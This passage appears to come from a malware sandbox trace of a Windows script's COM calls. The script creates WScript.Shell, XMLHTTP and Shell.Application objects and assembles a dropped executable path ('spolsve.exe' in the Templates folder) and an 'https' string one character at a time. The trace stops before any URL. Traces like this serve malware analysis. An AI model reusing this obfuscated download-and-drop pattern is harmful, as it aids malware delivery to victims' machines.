[3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.630] IUnknown:Release (This=0x1d39d552cd0) returned 0x3 [0060.630] IUnknown:AddRef (This=0x1d39d552800) returned 0x4 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d552800, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.630] IUnknown:Release (This=0x1d39d552800) returned 0x3 [0060.630] IUnknown:AddRef (This=0x1d39d5528b0) returned 0x4 [0060.630] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d5528b0, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.631] IUnknown:Release (This=0x1d39d5528b0) returned 0x3 [0060.631] IUnknown:AddRef (This=0x1d39d552b18) returned 0x6 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.631] IUnknown:Release (This=0x1d39d552b18) returned 0x5 [0060.631] IUnknown:AddRef (This=0x1d39d55b180) returned 0x5 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d55b180, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.631] IUnknown:Release (This=0x1d39d55b180) returned 0x4 [0060.631] IUnknown:AddRef (This=0x1d39d55b288) returned 0x4 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d55b288, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.631] IUnknown:Release (This=0x1d39d55b288) returned 0x3 [0060.631] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd8 | out: ppvObject=0x33e4fb5dd8*=0x0) returned 0x80004002 [0060.631] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb5dd0 | out: ppvObject=0x33e4fb5dd0*=0x0) returned 0x80004002 [0060.631] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.661] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x33e4fb60f0 | out: lpclsid=0x33e4fb60f0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0060.664] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0060.664] CoCreateInstance (in: rclsid=0x33e4fb60f0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7ffce0bbe8c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e4fb5f98 | out: ppv=0x33e4fb5f98*=0x1d3972f53b8) returned 0x0 [0061.304] WshShell:IUnknown:QueryInterface (in: This=0x1d3972f53b8, riid=0x7ffce0bd5eb0*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x33e4fb5fb0 | out: ppvObject=0x33e4fb5fb0*=0x0) returned 0x80004002 [0061.304] WshShell:IUnknown:QueryInterface (in: This=0x1d3972f53b8, riid=0x7ffce0bd5ec0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x33e4fb5fb8 | out: ppvObject=0x33e4fb5fb8*=0x0) returned 0x80004002 [0061.304] WshShell:IUnknown:QueryInterface (in: This=0x1d3972f53b8, riid=0x7ffce0bbb860*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb5fd8 | out: ppvObject=0x33e4fb5fd8*=0x1d3972f5390) returned 0x0 [0061.305] WshShell:IUnknown:Release (This=0x1d3972f53b8) returned 0x1 [0061.305] WshShell:IUnknown:AddRef (This=0x1d3972f5390) returned 0x2 [0061.305] WshShell:IUnknown:Release (This=0x1d3972f5390) returned 0x1 [0061.307] WshShell:IDispatch:GetIDsOfNames (in: This=0x1d3972f5390, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33e4fb6160*="SpecialFolders", cNames=0x1, lcid=0x1d300000409, rgDispId=0x33e4fb6144 | out: rgDispId=0x33e4fb6144*=100) returned 0x0 [0061.315] WshShell:IDispatch:Invoke (in: This=0x1d3972f5390, dispIdMember=100, riid=0x7ffce0bc3868*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Templates", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x1d39d7a6530, pExcepInfo=0x33e4fb6110, puArgErr=0x33e4fb60f0 | out: pDispParams=0x33e4fb60f8*(rgvarg=([0]=0x1d39d7a5d88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Templates", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x1d39d7a6530*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates", varVal2=0x0), pExcepInfo=0x33e4fb6110*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33e4fb60f0*=0x9dc6d070) returned 0x0 [0061.446] CLSIDFromProgIDEx (in: lpszProgID="microsoft.xmlhttp", lpclsid=0x33e4fb60f0 | out: lpclsid=0x33e4fb60f0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0 [0061.447] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0061.447] CoCreateInstance (in: rclsid=0x33e4fb60f0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7ffce0bbe8c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e4fb5f98 | out: ppv=0x33e4fb5f98*=0x1d39b4a5e70) returned 0x0 [0061.451] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x1d39b4a5e70, riid=0x7ffce0bd5eb0*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x33e4fb5fb0 | out: ppvObject=0x33e4fb5fb0*=0x0) returned 0x80004002 [0061.451] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x1d39b4a5e70, riid=0x7ffce0bd5ec0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x33e4fb5fb8 | out: ppvObject=0x33e4fb5fb8*=0x0) returned 0x80004002 [0061.451] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x1d39b4a5e70, riid=0x7ffce0bbb860*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb5fd8 | out: ppvObject=0x33e4fb5fd8*=0x1d39b4a5e30) returned 0x0 [0061.451] XMLHTTPRequest:IUnknown:Release (This=0x1d39b4a5e70) returned 0x1 [0061.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d398083838, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0061.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d398543678, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0061.452] VarAdd (in: pvarLeft=0x1d39d7a6530, pvarRight=0x1d39d7a6430, pvarResult=0x1d39d7a63f0 | out: pvarResult=0x1d39d7a63f0) returned 0x0 [0061.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d398219698, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0061.452] VarBstrCat (in: bstrLeft="Sh", bstrRight="e", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d38f409b38, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0061.452] VarBstrCat (in: bstrLeft="She", bstrRight="l", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb60f8, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shel", bstrRight="l", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6e38, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell", bstrRight=".", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6878, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.", bstrRight="A", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb68d8, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.A", bstrRight="p", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6a58, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.Ap", bstrRight="p", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6f58, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.App", bstrRight="l", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7058, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.Appl", bstrRight="i", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7718, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.Appli", bstrRight="c", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7198, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.Applic", bstrRight="a", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb71f8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.Applica", bstrRight="t", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7078, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.Applicat", bstrRight="i", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6fd8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.Applicati", bstrRight="o", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7158, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0061.453] VarBstrCat (in: bstrLeft="Shell.Applicatio", bstrRight="n", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.454] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x33e4fb60f0 | out: lpclsid=0x33e4fb60f0*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0 [0061.456] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0061.456] CoCreateInstance (in: rclsid=0x33e4fb60f0*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x7ffce0bbe8c0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33e4fb5f98 | out: ppv=0x33e4fb5f98*=0x1d39dbefa90) returned 0x0 [0061.459] Shell:IUnknown:QueryInterface (in: This=0x1d39dbefa90, riid=0x7ffce0bd5eb0*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x33e4fb5fb0 | out: ppvObject=0x33e4fb5fb0*=0x0) returned 0x80004002 [0061.459] Shell:IUnknown:QueryInterface (in: This=0x1d39dbefa90, riid=0x7ffce0bd5ec0*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x33e4fb5fb8 | out: ppvObject=0x33e4fb5fb8*=0x0) returned 0x80004002 [0061.459] Shell:IUnknown:QueryInterface (in: This=0x1d39dbefa90, riid=0x7ffce0bbb860*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb5fd8 | out: ppvObject=0x33e4fb5fd8*=0x1d39dbefa90) returned 0x0 [0061.459] Shell:IUnknown:Release (This=0x1d39dbefa90) returned 0x1 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8d248, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates", bstrRight="\\", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8d2d8, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\", bstrRight="s", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8ca08, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\s", bstrRight="p", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d398083838, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\sp", bstrRight="o", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8c828, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spo", bstrRight="l", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d398543678, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spol", bstrRight="s", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6e38, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spols", bstrRight="v", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6878, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsv", bstrRight="e", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb68d8, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0061.459] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve", bstrRight=".", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7698, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0061.460] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.", bstrRight="e", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb71f8, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0061.460] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.e", bstrRight="x", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb7598, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0061.460] VarBstrCat (in: bstrLeft="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.ex", bstrRight="e", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8d2d8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0061.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8ca08, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0061.460] VarBstrCat (in: bstrLeft="h", bstrRight="t", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8c828, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0061.460] VarBstrCat (in: bstrLeft="ht", bstrRight="t", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dc8d248, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0061.461] VarBstrCat (in: bstrLeft="htt", bstrRight="p", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6e38, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0061.461] VarBstrCat (in: bstrLeft="http", bstrRight="s", pbstrResult=0x33e4fb6120 | out: pbstrResult=0x33e4fb6120) returned 0x0 [0061.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6100, cbMultiByte=1, lpWideCharStr=0x1d39dbb6878, cchWideChar=1 | out: 